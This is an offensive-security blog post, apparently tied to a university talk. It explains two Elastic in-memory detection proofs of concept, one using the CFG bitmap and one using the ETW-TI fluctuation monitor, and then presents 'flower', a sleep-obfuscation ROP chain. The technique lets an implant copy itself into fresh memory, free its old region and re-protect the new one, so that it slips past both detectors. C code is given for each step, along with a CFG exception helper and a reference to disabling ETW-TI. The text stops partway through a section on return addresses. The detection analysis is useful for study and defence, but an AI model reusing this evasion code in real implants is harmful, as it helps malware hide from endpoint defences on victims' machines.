prelude
This is the blogpost adding more insight to my talk I gave at university. I went down several rabbitholes when it comes to in memory evasion, both from an offensive and defensive perspective. I hope it will give others more ideas as there is many more things to uncover about this subject. More things about this subject soon TM.
The technique presented here is rather primitive and if anything, very silly; this does prove one thing, even the more cutting edge and scaleable detections can be juked very easily.
Only by defenders and attackers working together will this field keep moving forward.
TOC
intro
Sleep obfuscation has now become a core component of modern implants, allowing an implant to conceal itself at rest and thus hide some if not most in-memory IOCs which can be hunted for with modern memory scanners (cf Moneta and PE-Sieve)
However in recent months, new ways to find those concealed implants have been discussed at BLACKHAT ASIA 2023 by John Uhlmann (aka jdu2600) a security engineer specializing in scalable Windows in-memory malware detection @ ELASTIC. It is worth noting that some of the research was uncovered by Gabriel Landeau, a “WinDbg’er” @ ELASTIC.
These new ways tackle the in-memory threat detection problem by leveraging two already existing components in the Windows operating system, they also fortunately address every public sleep obfuscation implementation rendering them insufficient by themselves.
you can run but you can’t hide
3 POCs were published following the talk, but only two here are really relevant for us, I mean no offense to the one of a kind work of Mr Uhlmann, Mr Landeau and ELASTIC as a whole when saying this and I firstly invite you to go watch his talk on youtube.com and give his POCs a quick read on GitHub, kindly.
The two POCs are:
- CFG-FindHiddenShellcode which uses the CFG bitmap
- EtwTi-FluctuationMonitor which leverages the immutable page principle
What’s so special about them ? Coupled together they can detect beloved and commonly used implementations of Ekko/Zilean, FOLIAGE, Gargoyle, … pretty accurately and with minimal overhead (no “who up callin RtlCreateTimer/NtQueueApcThread ?”).
The scope of this blogpost will be to prove that it is in fact possible to address those two rather new detections in a rather silly way (I will talk about a sane way but it’s not as silly >:[ ), I won’t spend too much time talking about how current sleep obfuscation techniques work in-depth or why it is very important (since it’s not exactly new and I am trying to keep the blogpost concise). I will instead recommend you watch Kyle Avery’s excellent talk on the matter if you are not up to speed already.
Unbeknownst to ELASTIC and Mr Uhlmann, I can run AND hide.
CFG-FindHiddenShellcode
So the first POC that caught my attention was CFG-FindHiddenShellcode. It leverages the CFG bitmap to find previously executable regions, which comes in handy when you want to find concealed implants, which at rest, will appear as ~X
But how ? why ? and what is even the CFG ?
wat da hell is CFG
Control Flow Guard is an exploit mitigation introduced in KB3000850 (November of 2014), it prevents the redirection of control flow to unexpected locations. This is achieved by the compiler inserting CFG instrumentation to the code, tightly restricting where indirect calls can execute.
__guard_check_icall_fptr will at runtime call ntdll!LdrpValidateUserCallTarget
CFG is known to be a pain in the case of sleep obfuscation due to most techniques (EKKO/ZILEAN/FOLIAGE/…) doing indirect calls through NtContinue, and can be a pain in general, even in legit (but usually old or lazy) software; It is thereby possible to actually add exceptions/valid targets so your process doesn’t blow up as shown here:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
# credits @C5pider (havoc)
/*!
* @brief
* add module + function to CFG exception list.
*
* @param ImageBase
* @param Function
*/
VOID CfgAddressAdd(
IN PVOID ImageBase,
IN PVOID Function
) {
CFG_CALL_TARGET_INFO Cfg = { 0 };
MEMORY_RANGE_ENTRY MemRange = { 0 };
VM_INFORMATION VmInfo = { 0 };
PIMAGE_NT_HEADERS NtHeader = { 0 };
ULONG Output = 0;
NTSTATUS NtStatus = STATUS_SUCCESS;
NtHeader = C_PTR( ImageBase + ( ( PIMAGE_DOS_HEADER ) ImageBase )->e_lfanew );
MemRange.NumberOfBytes = U_PTR( NtHeader->OptionalHeader.SizeOfImage + 0x1000 - 1 ) &~( 0x1000 - 1 );
MemRange.VirtualAddress = ImageBase;
/* set cfg target call info */
Cfg.Flags = CFG_CALL_TARGET_VALID;
Cfg.Offset = Function - ImageBase;
VmInfo.dwNumberOfOffsets = 1;
VmInfo.plOutput = &Output;
VmInfo.ptOffsets = &Cfg;
VmInfo.pMustBeZero = FALSE;
VmInfo.pMoarZero = FALSE;
if ( ! NT_SUCCESS( NtStatus = SysNtSetInformationVirtualMemory( NtCurrentProcess(), VmCfgCallTargetInformation, 1, &MemRange, &VmInfo, sizeof( VmInfo ) ) ) ) {
PRINTF( "NtSetInformationVirtualMemory Failed => %p", NtStatus );
}
}
|
You normally would use the “SetProcessValidCallTargets” API, however I wanted to show this snippet for a more detailed explanation of how this would be achieved. Also it might sound counter intuitive that you can just add a valid indirect call target at will. However, for shellcode to actually add itself as a valid indirect call target it would require itself to somehow already be a valid target, considering you would need code execution. In layman terms this is a typical chicken and egg problem.
This way, additional memory ranges can be marked as valid in the eyes of CFG. But how does it keep track of those ?
bits and maps
CFG uses a bitmap to keep track of valid targets, where a set bit indicates that the address is a valid indirect call target. This bitmap is mapped in CFG enabled processes when they are created; Once mapped, the OS will store the address of said bitmap at ntdll!LdrSystemDllInitBlock + 0x60 and its size at ntdll!LdrSystemDllInitBlock + 0x68. Before an indirect call, ntdll!LdrpValidateUserCallTarget is called to verify the target address at runtime.
It would be good to note that the CFG bitmap is PAGE_READONLY and that trying to tamper with it upfront would be a very poor way to go about things.
ntdll!LdrpValidateUserCallTarget (called by __guard_check_icall_fptr in our CFG instrumented binary) tests a bit of the CFG bitmap that corresponds to the target address.
As explained by Zhang Yunhai the following is how the bitmap is tested:
- Extract the highest 24 bit of the target address to form an index
- Fetch a 32-bit DWORD from the CFG Bitmap using the index
- Extract the 4th to 8th bits of the target address to form an offset n
- Set the lowest bit of offset n if the target address is not 0x10 aligned
- Test the nth bit of the 32-bit DWORD
If the bit isn’t set, then the target address is invalid; In this case, ntdll!RtlpHandleInvalidUserCallTarget is called, which raises interrupt 0x29 (__fastfail) unless specific conditions are met, including:
where ?
This bitmap is stored in PS_DLL_INIT_BLOCK.CfgBitMap however the way it’s fetched in the POC circumvents the fact that the structure itself is not documented and that its offset has changed previously
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
PVOID GetCfgBitmapPointer()
{
PVOID pCfgBitmap = NULL;
// PS_SYSTEM_DLL_INIT_BLOCK is exported from ntdll as LdrSystemDllInitBlock, but the structure itself is not documented
// and the offset has changed previously.
// We could hardcode offsets, or bruteforce this block looking for a pointer that matches the expected 2TB MEM_MAPPED
// region characteristics.
// However, the first instruction of LdrControlFlowGuardEnforced is usually -
// 48 83 xx xx xx xx 00 00 cmp PS_SYSTEM_DLL_INIT_BLOCK.CfgBitMap, 0
// So we can calculate the absolute address from the rel32 offset in this instruction.
PVOID pLdrControlFlowGuardEnforced = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrControlFlowGuardEnforced");
if (!pLdrControlFlowGuardEnforced)
return NULL;
PUCHAR Rip = (PUCHAR)pLdrControlFlowGuardEnforced + 8;
PDWORD pRipRelativeOffset = (PDWORD)((PUCHAR)pLdrControlFlowGuardEnforced + 3);
DWORD RipRelativeOffset = 0;
SIZE_T szBytesRead = 0;
if (!ReadProcessMemory(GetCurrentProcess(), pRipRelativeOffset, &RipRelativeOffset, sizeof(RipRelativeOffset), &szBytesRead))
return NULL;
return Rip + RipRelativeOffset;
}
|
The reason why the author reads the memory of our own process is due to how ASLR and known DLLs (which uses COW) behave. PS_SYSTEM_DLL_INIT_BLOCK.CfgBitmap lives in ntdll.dll which is a known DLL, thus we’ll find this pointer to the CFG bitmap to live at the same address in every usermode process. So getting the pointer address in our process or a remote one doesn’t really matter; what matters is which address space we’re querying.
bitmap behavior
*Protect and *Alloc functions will by default treat a specified region of PAGE_EXECUTE + MEM_COMMIT pages as valid indirect call targets, this in turn updating the bitmap; although, it is possible to override this behavior by specifying PAGE_TARGETS_INVALID when calling *Alloc functions or PAGE_TARGETS_NO_UPDATE when calling *Protect functions (when changing the protection to *X).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
/*
EXTRACT OF [https://learn.microsoft.com/en-us/windows/win32/memory/memory-protection-constants]
Constants > PAGE_TARGETS_NO_UPDATE
[...] The default behavior for VirtualProtect protection change to executable is to mark all locations as valid call targets for CFG.
Constants > PAGE_TARGETS_INVALID
Sets all locations in the pages as invalid targets for CFG. Used along with any execute page protection like PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY.
Any indirect call to locations in those pages will fail CFG checks and the process will be terminated.
The default behavior for executable pages allocated is to be marked valid call targets for CFG.
*/
|
The reason for this default behavior and why private executable memory in general is a thing is because of JIT, which we will talk about later on.
This means that when a committed memory region has it’s protection changed to X, the CFG bitmap will by default record the region as a valid indirect call target (unless specified otherwise as told previously), however the bitmap WILL NOT be updated when the protection is toggled to ~X, as once the region was marked as a valid indirect call target, no matter it’s next protections, this mark remains; see where we going ??
the blessed side-effect
Now that we know how the bitmap acts, the following can be established:
“The CFG bitmap, as an unintended side-effect, will record the location of every private memory region that are or were previously executable during the lifetime of the process”
This is actually a very powerful side-effect because, considering a beacon at rest will appear as ~X when performing sleep obfuscation, it is possible, through the bitmap, to know if it was previously executable, this effectively making concealed beacons stand out in most host processes.
This “side-effect” is what CFG-FindHiddenShellcode harnesses to uncover “hidden” pages (pages that were previously executable but now aren’t), if it were to be chained in a detection pipeline it would certainly help when it comes to triaging processes worth scanning. It also is cheap enough performance wise.
We can see the CFG bitmap being used in action to find hidden pages in the main source file. As said previously, the pointer lives at the same location in every process however we only care about reading what it points to in the relevant processes.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
PULONG_PTR GetCfgBitmap(HANDLE hProcess)
{
static PVOID ppCfgBitmap = GetCfgBitmapPointer();
PULONG_PTR pCfgBitmap = NULL;
MEMORY_BASIC_INFORMATION mbi{};
SIZE_T szBytesRead = 0;
if (!ppCfgBitmap ||
!ReadProcessMemory(hProcess, ppCfgBitmap, &pCfgBitmap, sizeof(pCfgBitmap), &szBytesRead) ||
(0 == pCfgBitmap) ||
!VirtualQueryEx(hProcess, pCfgBitmap, &mbi, sizeof(mbi)))
{
return NULL;
}
// Quick sanity check that our CFG bitmap pointer is the base of a MEM_MAPPED allocation.
// We could also validate that it is 2TB in size.
if ((mbi.AllocationBase != pCfgBitmap) || (MEM_MAPPED != mbi.Type))
{
printf("%p PS_SYSTEM_DLL_INIT_BLOCK.CfgBitMap = %p is invalid\n", ppCfgBitmap, pCfgBitmap);
pCfgBitmap = NULL;
}
return pCfgBitmap;
}
|
Once the CFG bitmap of a process of interest is retrieved, the author queries it’s address space in search of MEM_COMMIT pages and when said pages are found, it’s going to query the bitmap with an index shift of 9
1
2
3
4
5
6
7
8
9
|
ULONG_PTR vaRegionEnd = va + mbiCfg.RegionSize * 64;
while (va < vaRegionEnd)
{
pCfgEntry = pCfgBitMap + ((ULONG_PTR)va >> CFG_INDEX_SHIFT);
SIZE_T stBytesRead = 0;
ULONG_PTR ulEntry = 0;
// TODO(jdu) This per-entry read is inefficient - just read the whole region upfront instead.
if (!ReadProcessMemory(hProcess, pCfgEntry, &ulEntry, sizeof(ulEntry), &stBytesRead))
break;
|
Each CFG bitmap page equals to 64 VA pages
The main detection mechanism is a bit later in the code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
if ((hiddenRegionSize > 0) && ((MAXULONG_PTR != ulEntry) || (va == vaRegionEnd)))
{
// The CFG bitmap indicates that this region has been executable during the lifetime
// of the process. Now check the VAD tree.
MEMORY_BASIC_INFORMATION mbiStart{};
MEMORY_BASIC_INFORMATION mbiEnd{};
if (VirtualQueryEx(hProcess, (PVOID)hiddenRegionStart, &mbiStart, sizeof(mbi)) &&
(MEM_COMMIT == mbiStart.State) &&
VirtualQueryEx(hProcess, (PVOID)(hiddenRegionStart + hiddenRegionSize - 1), &mbiEnd, sizeof(mbi)))
{
// Is this region non-executable in the VAD tree?
bool bHiddenRegion = !(PAGE_EXECUTE_FLAGS & mbiStart.Protect) &&
!(PAGE_EXECUTE_FLAGS & mbiStart.AllocationProtect);
// Handle a few common (likely) false positives.
bool bLikelyFalsePositive =
(mbiStart.AllocationBase != mbiEnd.AllocationBase) || // hidden region overlaps allocation
(hiddenRegionSize == 0x3000); // 12K region
if (bHiddenRegion && (bAggressive || !bLikelyFalsePositive))
{
result.push_back((PVOID)(hiddenRegionStart));
}
}
hiddenRegionStart = 0;
hiddenRegionSize = 0;
}
|
Since the CFG bitmaps indicates that the region has been executable at some point, the author queries the region of interest. If according to the VAD (Virtual Address Descriptor), the region isn’t executable as seen in the bHiddenRegion bool:
1
2
3
4
5
|
constexpr auto PAGE_EXECUTE_FLAGS = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY;
[...]
// Is this region non-executable in the VAD tree?
bool bHiddenRegion = !(PAGE_EXECUTE_FLAGS & mbiStart.Protect) &&
!(PAGE_EXECUTE_FLAGS & mbiStart.AllocationProtect);
|
Then the region is considered as “hidden” because although the CFG bitmap clearly states that said region was previously executable, it now isn’t. Thus the hidden region is saved to our results vector.
1
2
3
4
|
if (bHiddenRegion && (bAggressive || !bLikelyFalsePositive))
{
result.push_back((PVOID)(hiddenRegionStart));
}
|
It’s worth noting that jdu2600 still makes sure to account for false positives,
1
2
3
4
|
// Handle a few common (likely) false positives.
bool bLikelyFalsePositive =
(mbiStart.AllocationBase != mbiEnd.AllocationBase) || // hidden region overlaps allocation
(hiddenRegionSize == 0x3000); // 12K region
|
This logic is repeated for every VA in the process (whilst still making sure we dont go over vaRegionEnd)
1
|
va += mbiCfg.RegionSize * 64; // Each CFG BitMap page corresponds to 64 VA pages
|
This is an efficient, low overhead, scaleable and pretty sneaky detection
EtwTi-FluctuationMonitor
This is the second POC that caught my attention and it’s, in my silly opinion, the nastiest of the two because it goes to show how OP ETW-TI is as a technology for defenders.
I should mention you could remove the talking stick privilege from ETW-TI in windows 10 and some versions of windows 11 etw-bye.cpp
the immutable page principle
This section will be extremely short because it’s something that just makes sense if you think about it
As said by jdu2600
It is security best practice that once a page is marked executable it should be immutable
That is the memory protection progression for code pages should only be RW to RX
TL;DR non executable memory made executable shouldn’t evolve beyond that point, apart from being freed, the same can be applied for writable
what about JIT
Private memory being made executable and then executed is actually not a direct sign of something suspicious going on as that’s how JIT behaves. However, JIT (Just in time) compilers just like AOT compilers (Ahead of time) only compile once.
It’s important to note that some JIT engines reuse allocations (I think .NET reuses them ?) and there is also legitimate API hooking to account for (for instance Discord will inject a hook to record your screen when you’re streaming)
As explained in the POC itself, fluctuation is still wildly different from JIT/AOT
1
2
3
4
5
6
|
// The set of all of the code pages in a process that have transitions from writable to non-writable,
// or from executable to non-executable. In both cases, these code pages should never be modified again.
// Proper JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute [-> Free]
// YOLO JIT: Allocate(RWX) -> memcpy(code) -> execute
// Bad JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute -> Protect(RW) -> re-use for new code
// Fluctuation: ... -> Protect(RX) -> execute -> Protect(~X) [-> encrypt] -> Protect(RX) -> ...
|
ETW who ?
ETW-TI is a kernel mode technology allowing the generation of events upon security-critical operations, including but not limited to executable memory creation but also memory protection changes
This event feed produced by EtwTi* functions embedded in the relevant kernel functions can only be consumed by security products, which need to be protected (PROTECTED_ANTIMALWARE_LIGHT) and thus required to be signed as such by Microsoft.
A list of all the events (at least on my system) can be found below
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
|
# logman query providers Microsoft-Windows-Threat-Intelligence
Provider GUID
-------------------------------------------------------------------------------
Microsoft-Windows-Threat-Intelligence {F4E1897C-BB5D-5668-F1D8-040F4D8DD344}
Value Keyword Description
-------------------------------------------------------------------------------
0x0000000000000001 KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL
0x0000000000000002 KERNEL_THREATINT_KEYWORD_ALLOCVM_LOCAL_KERNEL_CALLER
0x0000000000000004 KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE
0x0000000000000008 KERNEL_THREATINT_KEYWORD_ALLOCVM_REMOTE_KERNEL_CALLER
0x0000000000000010 KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL
0x0000000000000020 KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_KERNEL_CALLER
0x0000000000000040 KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE
0x0000000000000080 KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_KERNEL_CALLER
0x0000000000000100 KERNEL_THREATINT_KEYWORD_MAPVIEW_LOCAL
0x0000000000000200 KERNEL_THREATINT_KEYWORD_MAPVIEW_LOCAL_KERNEL_CALLER
0x0000000000000400 KERNEL_THREATINT_KEYWORD_MAPVIEW_REMOTE
0x0000000000000800 KERNEL_THREATINT_KEYWORD_MAPVIEW_REMOTE_KERNEL_CALLER
0x0000000000001000 KERNEL_THREATINT_KEYWORD_QUEUEUSERAPC_REMOTE
0x0000000000002000 KERNEL_THREATINT_KEYWORD_QUEUEUSERAPC_REMOTE_KERNEL_CALLER
0x0000000000004000 KERNEL_THREATINT_KEYWORD_SETTHREADCONTEXT_REMOTE
0x0000000000008000 KERNEL_THREATINT_KEYWORD_SETTHREADCONTEXT_REMOTE_KERNEL_CALLER
0x0000000000010000 KERNEL_THREATINT_KEYWORD_READVM_LOCAL
0x0000000000020000 KERNEL_THREATINT_KEYWORD_READVM_REMOTE
0x0000000000040000 KERNEL_THREATINT_KEYWORD_WRITEVM_LOCAL
0x0000000000080000 KERNEL_THREATINT_KEYWORD_WRITEVM_REMOTE
0x0000000000100000 KERNEL_THREATINT_KEYWORD_SUSPEND_THREAD
0x0000000000200000 KERNEL_THREATINT_KEYWORD_RESUME_THREAD
0x0000000000400000 KERNEL_THREATINT_KEYWORD_SUSPEND_PROCESS
0x0000000000800000 KERNEL_THREATINT_KEYWORD_RESUME_PROCESS
0x0000000001000000 KERNEL_THREATINT_KEYWORD_FREEZE_PROCESS
0x0000000002000000 KERNEL_THREATINT_KEYWORD_THAW_PROCESS
0x0000000004000000 KERNEL_THREATINT_KEYWORD_CONTEXT_PARSE
0x0000000008000000 KERNEL_THREATINT_KEYWORD_EXECUTION_ADDRESS_VAD_PROBE
0x0000000010000000 KERNEL_THREATINT_KEYWORD_EXECUTION_ADDRESS_MMF_NAME_PROBE
0x0000000020000000 KERNEL_THREATINT_KEYWORD_READWRITEVM_NO_SIGNATURE_RESTRICTION
0x0000000040000000 KERNEL_THREATINT_KEYWORD_DRIVER_EVENTS
0x0000000080000000 KERNEL_THREATINT_KEYWORD_DEVICE_EVENTS
0x0000000100000000 KERNEL_THREATINT_KEYWORD_READVM_REMOTE_FILL_VAD
0x0000000200000000 KERNEL_THREATINT_KEYWORD_WRITEVM_REMOTE_FILL_VAD
0x0000000400000000 KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_FILL_VAD
0x0000000800000000 KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL_KERNEL_CALLER_FILL_VAD
0x0000001000000000 KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_FILL_VAD
0x0000002000000000 KERNEL_THREATINT_KEYWORD_PROTECTVM_REMOTE_KERNEL_CALLER_FILL_VAD
0x8000000000000000 Microsoft-Windows-Threat-Intelligence/Analytic
Value Level Description
-------------------------------------------------------------------------------
0x04 win:Informational Information
PID Image
-------------------------------------------------------------------------------
0x00000000
|
In the case of EtwTi-FluctuationMonitor the event being leveraged is KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL as seen in the first lines of the POC
1
2
3
4
5
6
|
int wmain(int, wchar_t**) {
printf("[*] Enabling Microsoft-Windows-Threat-Intelligence (KEYWORD_PROTECTVM_LOCAL)\n");
krabs::provider<> ti_provider(L"Microsoft-Windows-Threat-Intelligence");
ti_provider.any(0x10); // KERNEL_THREATINT_KEYWORD_PROTECTVM_LOCAL
krabs::event_filter protectvm_filter(krabs::predicates::id_is(7));
|
This event occurs when a *Protect function is called, with it some information is emitted such as:
- PID
- Base address
- Protection mask
- Last protection mask
The information of the event is then parsed
1
2
3
4
5
6
7
8
|
auto protectvm_cb = [](const EVENT_RECORD& record, const krabs::trace_context& trace_context) {
krabs::schema schema(record, trace_context.schema_locator);
krabs::parser parser(schema);
auto ProcessID = parser.parse<DWORD>(L"CallingProcessId");
auto BaseAddress = parser.parse<PVOID>(L"BaseAddress");
auto ProtectionMask = parser.parse<DWORD>(L"ProtectionMask");
auto LastProtectionMask = parser.parse<DWORD>(L"LastProtectionMask");
|
Then using ProtectionMask and LastProtectionMask we can see the implementation of the immutable page principle in action.
1
2
|
if ((!IsExecutable(LastProtectionMask) && IsExecutable(ProtectionMask)) ||
(IsWritable(LastProtectionMask) && !IsWritable(ProtectionMask)))
|
Once a writeable page is made unwriteable or an unexecutable page is made executable, said pages are recorded as now being immutable.
1
|
g_ImmutableCodePages[ProcessID].insert(BaseAddress);
|
However if the page already was immutable then an alert is raised
1
2
3
4
5
6
7
8
9
10
11
12
13
|
auto immutable_iter = g_ImmutableCodePages.find(ProcessID);
if (immutable_iter != g_ImmutableCodePages.cend() &&
immutable_iter->second.find(BaseAddress) != immutable_iter->second.cend())
{
// An immutable code page has been potentially modfied.
CONSOLE_SCREEN_BUFFER_INFO console_info{};
static auto hStdOutput = GetStdHandle(STD_OUTPUT_HANDLE);
GetConsoleScreenBufferInfo(hStdOutput, &console_info);
SetConsoleTextAttribute(hStdOutput, RED);
printf("[!] %S %p is fluctuating\n", ProcessName(ProcessID).c_str(), BaseAddress);
SetConsoleTextAttribute(hStdOutput, console_info.wAttributes);
}
|
Since it’s a POC it just gives a nice although a bit scary warning, but this could be used to alert on or even triage processes worth investigating for further analysis.
the silly overlap
There is some kind of overlap (understandably) between those two POCs, where we need to avoid fluctuating and thus break the chain between each RW->RX toggle. Ironically EtwTi-FluctuationMonitor had the answer for us all this time.
1
2
3
4
|
// Proper JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute [-> Free]
// YOLO JIT: Allocate(RWX) -> memcpy(code) -> execute
// Bad JIT: Allocate(RW) -> memcpy(code) -> Protect(RX) -> execute -> Protect(RW) -> re-use for new code
// Fluctuation: ... -> Protect(RX) -> execute -> Protect(~X) [-> encrypt] -> Protect(RX) -> ...
|
We just need to behave like “proper” JIT (I am following their definitions) and we’ll be fine. Optionally and as always we could just stay in a .NET RWX JIT region and chill there, simple and works, on top of being less suspicious than “mockingjay” by a mile; but eh that’s a bit boring isn’t it ?
the silly solution
The solution presented here is stupid but works; does that mean the detections are stupid ? Yes No, but it goes to show how attackers can masquerade as legit behavior, even if in a stupid way, to slip through detections.
the modified ropchain
By making our beacon move itself in memory we can simulate JIT behavior and slip through an honest gap in those detections.
I say JIT, I am aware it’s a dollar store version of it; I am only calling it this because it’s the very behavior that the aforementionned POCs have to account for to not have too many FPs
The following allows this:
- Allocate a new region as RW
- Ropchain:
- Wait for start
- Move ourselves to new region
- [optionally zero the old copy]
- Free the old region
- stack masking/encryption/…
- Sleep
- Undo stack masking/encryption/…
- Protect new region as RX
- the end
This ropchain logic I codename flower
This allows to slip through CFG-FindHiddenShellcode as the “new region” isn’t previously executable and thus does not count as an hidden page and EtwTi-FluctuationMonitor since it looks like we are doing “proper” JIT ( RW->memcpy->RX->FREE )
allocation from the dollar store
To flow through memory, we try to allocate a new region at a given offset from ourselves in memory. It’s worth noting you could totally omit this and just allocate a new region and ball. We do this simply to avoid going in a region where we were previously, not that I think it would matter.
TL;DR: cuz i can and i will
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
FUNC PVOID FwpMemPrepare(
_In_ PFLOWER_CTX Ctx,
_In_ ULONG Size
) {
PVOID Memory = { 0 };
ULONG Offset = FW_BASE_OFS;
ULONG Prot = PAGE_READWRITE;
//
// try allocating a new region till we are successful
// if an allocation fails, increment the base offset from
// the shellcode base by ShiftOfs
//
PRINTF( "[FLOWER] [*] Trying to allocate NxtBuf @ %p\n", C_PTR( U_PTR( SHC_START() ) + Offset ) );
while ( TRUE ) {
if ( ! ( Memory = Ctx->Win32.VirtualAlloc(
C_PTR( U_PTR( SHC_START() ) + Offset ),
Size,
( MEM_COMMIT | MEM_RESERVE ),
Prot
) ) ) {
Offset += FW_SHIFT_OFS;
continue;
}
PRINTF( "[FLOWER] [*] NxtBuf allocated @ %p\n", Memory );
break;
}
return Memory;
}
|
the “ropchain”
For demonstration purposes and to show this technique just works we’ll make a helper function that generates an array of CONTEXT structs so you can use them with EKKO/ZILEAN/FOLIAGE/… (also because it’s surprisingly easier to write and understand)
The signature of the function is the following
1
2
3
4
5
6
7
8
9
|
FUNC NTSTATUS FwRopChain(
_In_ PFLOWER_CTX Ctx,
_In_ ULONG Delay,
_In_ PCONTEXT RopInit,
_In_ PVOID NxtBuf,
_In_ ULONG Flags,
_Out_ PCONTEXT* Rop,
_Out_ SIZE_T* RopLen
)
|
I won’t really delve and explain each parameter as the comments in the project itself should get you going.
Also, because it’s just easier we allocate our CONTEXT structs on the heap, we will probably not use all of them buuuut that does not matter as we can just free them once we crafted the ropchain
1
2
3
4
5
6
7
8
|
//
// allocate FLOWER_MAX_LEN CONTEXTs on the heap
// we will probably not use all of them but easier like this
//
if ( ! NT_SUCCESS( Status = FwpRopAlloc( Ctx, Rop ) ) ) {
PRINTF( "[FLOWER] [-] FwpRopAlloc failed [Status: 0x%lx]\n", Status );
goto LEAVE;
}
|
Once that’s done we can start tinkering with the ropchain itself.
1
2
3
4
5
|
OBF_JMP( Inc, Ctx->Win32.WaitForSingleObjectEx );
Rop[ Inc ]->Rcx = U_PTR( Ctx->Evnts.Start );
Rop[ Inc ]->Rdx = U_PTR( INFINITE );
Rop[ Inc ]->R8 = U_PTR( FALSE );
Inc++;
|
So far pretty classic, we just want to wait for the start event to be signaled.
OBF_JMP is just a macro to make the usage of JMP gadgets to hide the content of RIP easier and more malleable.
1
2
3
4
5
6
7
8
9
10
11
|
//
// https://github.com/HavocFramework/Havoc/blob/main/payloads/Demon/include/core/SleepObf.h#L16
//
#define OBF_JMP( i, p ) \
if ( Flags & FLOWER_GADGET_RAX ) { \
Rop[ i ]->Rax = U_PTR( p ); \
} if ( Flags & FLOWER_GADGET_RDI ) { \
Rop[ i ]->Rdi = U_PTR( p ); \
} else { \
Rop[ i ]->Rip = U_PTR( p ); \
}
|
Next we want to move ourselves to the new region (duh), this can be achieved with RtlMoveMemory/RtlCopyMemory or literally any functions that allow you to write a buffer somewhere.
1
2
3
4
5
6
7
8
9
|
//
// copy ourselves to the new region
// NOTE: can use RtlCopyMemory or literally any write function
//
OBF_JMP( Inc, Ctx->Win32.RtlMoveMemory )
Rop[ Inc ]->Rcx = U_PTR( NxtBuf );
Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcBase );
Rop[ Inc ]->R8 = U_PTR( Ctx->ShcLength );
Inc++;
|
If it wasn't clear yet, **NxtBuf** is a pointer to our "new" memory region
Obviously to avoid hoarding memory we should free the old region
1
2
3
4
5
|
OBF_JMP( Inc, Ctx->Win32.VirtualFree )
Rop[ Inc ]->Rcx = U_PTR( Ctx->ShcBase );
Rop[ Inc ]->Rdx = U_PTR( 0 );
Rop[ Inc ]->R8 = U_PTR( MEM_RELEASE );
Inc++;
|
Optionally we zero out the old copy before freeing the region, this does flip RX to RW however EtwTi-FluctuationMonitor doesn’t seem to be screaming at this (possible oversight ?) and the time spent as a “hidden page” is so minimal we might aswell disregard it, hence why I included this option
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
if ( Flags & FLOWER_ZERO_PROTECT ) {
OBF_JMP( Inc, Ctx->Win32.VirtualProtect )
Rop[ Inc ]->Rcx = U_PTR( Ctx->ShcBase );
Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcLength );
Rop[ Inc ]->R8 = U_PTR( PAGE_READWRITE );
Rop[ Inc ]->R9 = U_PTR( &Tmp );
Inc++;
OBF_JMP( Inc, Ctx->Win32.RtlZeroMemory )
Rop[ Inc ]->Rcx = U_PTR( Ctx->ShcBase );
Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcLength );
Inc++;
}
|
Zeroing out the old region by reallocating over it as RW, zeroing it then freeing it again will be left as an exercise to the reader
Then we can do stuff like masking our stack, encrypting etc; do remember that NxtBuf is still PAGE_READWRITE here
Of course let’s not forget to sleep else we are running but not hiding :P
1
2
3
4
5
6
7
8
9
|
//
// could totally use NtDelayExecution etc
// feel free to change
//
OBF_JMP( Inc, Ctx->Win32.WaitForSingleObjectEx )
Rop[ Inc ]->Rcx = U_PTR( NtCurrentProcess() );
Rop[ Inc ]->Rdx = U_PTR( Delay );
Rop[ Inc ]->R8 = U_PTR( FALSE );
Inc++;
|
Once we are done sleeping we just need to toggle NxtBuf to RX (and signal the end of the ropchain)
1
2
3
4
5
6
|
OBF_JMP( Inc, Ctx->Win32.VirtualProtect )
Rop[ Inc ]->Rcx = U_PTR( NxtBuf );
Rop[ Inc ]->Rdx = U_PTR( Ctx->ShcLength );
Rop[ Inc ]->R8 = U_PTR( PAGE_EXECUTE_READ );
Rop[ Inc ]->R9 = U_PTR( &Tmp );
Inc++;
|
And then it’s GGs, we only flip the permissions once then free and that’s legit unlike “fluctuation” where we keep on flipping protections forever and ever.
can’t C me
As said previously, this technique still allows for things like stack masking and encryption, and since the only real modification is in the ropchain itself you can use any technique you like to queue the ropchain.
Evasion wise since we slip past those two new POCs without losing features like stack masking etc, it’s a net gain, atleast for now.
what about return addresses ?
If you thought of this, good job :>
After moving, the return addresses on our stack from the nested calls in our beacon still point to the old region we were in prior to “flowing”.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
